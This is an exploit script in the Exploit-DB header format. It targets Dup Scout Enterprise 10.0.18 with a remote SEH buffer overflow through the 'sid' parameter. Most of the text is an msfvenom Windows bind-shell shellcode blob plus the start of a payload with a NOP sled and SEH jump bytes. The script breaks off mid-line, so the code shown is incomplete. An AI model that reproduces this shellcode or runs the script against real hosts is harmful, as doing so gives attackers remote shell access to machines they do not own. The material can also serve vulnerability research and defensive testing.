# Exploit Title: Dup Scout Enterprise 10.0.18 - 'sid' Remote Buffer Overflow (SEH) # Date: 2020-12-08 # Exploit Author: Andrés Roldán # Vendor Homepage: http://www.dupscout.com # Software Link: http://www.dupscout.com/downloads.html # Version: 10.0.18 # Tested on: Windows 10 Pro x64 #!/usr/bin/env python3 import socket import struct HOST = '127.0.0.1' PORT = 80 # msfvenom --platform windows --arch x86 -p windows/shell_bind_tcp -b "\x00\0x9\x0a\x0d\x20" -f python -v SHELL SHELL = b"" SHELL += b"\x29\xc9\x83\xe9\xae\xe8\xff\xff\xff\xff\xc0\x5e" SHELL += b"\x81\x76\x0e\xfa\xfa\xc4\x90\x83\xee\xfc\xe2\xf4" SHELL += b"\x06\x12\x46\x90\xfa\xfa\xa4\x19\x1f\xcb\x04\xf4" SHELL += b"\x71\xaa\xf4\x1b\xa8\xf6\x4f\xc2\xee\x71\xb6\xb8" SHELL += b"\xf5\x4d\x8e\xb6\xcb\x05\x68\xac\x9b\x86\xc6\xbc" SHELL += b"\xda\x3b\x0b\x9d\xfb\x3d\x26\x62\xa8\xad\x4f\xc2" SHELL += b"\xea\x71\x8e\xac\x71\xb6\xd5\xe8\x19\xb2\xc5\x41" SHELL += b"\xab\x71\x9d\xb0\xfb\x29\x4f\xd9\xe2\x19\xfe\xd9" SHELL += b"\x71\xce\x4f\x91\x2c\xcb\x3b\x3c\x3b\x35\xc9\x91" SHELL += b"\x3d\xc2\x24\xe5\x0c\xf9\xb9\x68\xc1\x87\xe0\xe5" SHELL += b"\x1e\xa2\x4f\xc8\xde\xfb\x17\xf6\x71\xf6\x8f\x1b" SHELL += b"\xa2\xe6\xc5\x43\x71\xfe\x4f\x91\x2a\x73\x80\xb4" SHELL += b"\xde\xa1\x9f\xf1\xa3\xa0\x95\x6f\x1a\xa5\x9b\xca" SHELL += b"\x71\xe8\x2f\x1d\xa7\x92\xf7\xa2\xfa\xfa\xac\xe7" SHELL += b"\x89\xc8\x9b\xc4\x92\xb6\xb3\xb6\xfd\x05\x11\x28" SHELL += b"\x6a\xfb\xc4\x90\xd3\x3e\x90\xc0\x92\xd3\x44\xfb" SHELL += b"\xfa\x05\x11\xfa\xf2\xa3\x94\x72\x07\xba\x94\xd0" SHELL += b"\xaa\x92\x2e\x9f\x25\x1a\x3b\x45\x6d\x92\xc6\x90" SHELL += b"\xeb\xa6\x4d\x76\x90\xea\x92\xc7\x92\x38\x1f\xa7" SHELL += b"\x9d\x05\x11\xc7\x92\x4d\x2d\xa8\x05\x05\x11\xc7" SHELL += b"\x92\x8e\x28\xab\x1b\x05\x11\xc7\x6d\x92\xb1\xfe" SHELL += b"\xb7\x9b\x3b\x45\x92\x99\xa9\xf4\xfa\x73\x27\xc7" SHELL += b"\xad\xad\xf5\x66\x90\xe8\x9d\xc6\x18\x07\xa2\x57" SHELL += b"\xbe\xde\xf8\x91\xfb\x77\x80\xb4\xea\x3c\xc4\xd4" SHELL += b"\xae\xaa\x92\xc6\xac\xbc\x92\xde\xac\xac\x97\xc6" SHELL += b"\x92\x83\x08\xaf\x7c\x05\x11\x19\x1a\xb4\x92\xd6" SHELL += b"\x05\xca\xac\x98\x7d\xe7\xa4\x6f\x2f\x41\x34\x25" SHELL += b"\x58\xac\xac\x36\x6f\x47\x59\x6f\x2f\xc6\xc2\xec" SHELL += b"\xf0\x7a\x3f\x70\x8f\xff\x7f\xd7\xe9\x88\xab\xfa" SHELL += b"\xfa\xa9\x3b\x45" PAYLOAD = ( b'\x90' * (2482 - len(SHELL)) + SHELL + b'\xeb\x10\x90\x90' + struct.pack('